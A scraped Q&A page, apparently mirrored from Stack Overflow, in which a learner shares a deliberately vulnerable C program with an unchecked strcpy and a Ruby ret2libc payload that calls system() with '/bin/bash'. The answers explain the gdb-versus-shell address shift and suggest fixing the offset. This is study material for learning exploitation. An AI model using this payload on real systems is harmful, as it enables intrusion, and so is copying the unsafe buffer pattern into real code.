Pergunta
I am learning about ret2libc buffer overflow exploits to bypass NX.
My vulnerable code (vuln.c):
https://stackoverflow.com/questions/17266787
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
Russian#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buffer[512];
if (argc != 2)
printf("NO\n");
else {
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
}
Compiled with this command: # gcc -o vuln vuln.c
I then created this simple ret2libc exploit in ruby (exploit.rb):
p = "A"*524
p += [0xb7e9ef10].pack('<I') # system()
p += [0xb7e79e46].pack('<I') # nomal ret val
p += [0xbffff75a].pack('<I') # "/bin/bash"
print(p)
If it run it in gdb with (gdb) r $(ruby exploit.rb) it gives me a nice bash shell.
I then try to run it in a normal shell with # ./vuln $(ruby exploit.rb), but instead of giving me a shell it gives me this instead: sh: 1: g:0:1: not found
ASLR is disabled and the only protection enabled is NX, I think.
Any help is appreciated.
Edit:
I am running this on i686 in case that helps.
Solução
The reason for shifting is the execution environment.
user@feynman:~$ ./getenv PWN
PWN ("/home/user/pwn") is at 0xbfffff82
user@feynman:~$ /home/user/getenv PWN
PWN ("/home/user/pwn") is at 0xbfffff70
Here the way of launching getenv is affecting address of the PWN.
Outras dicas
You achieved code execution but the address of the SHELL env var is off. Try [address of shell in gdb] + 4, or in gdb, x/s 0xbffff75a+4.
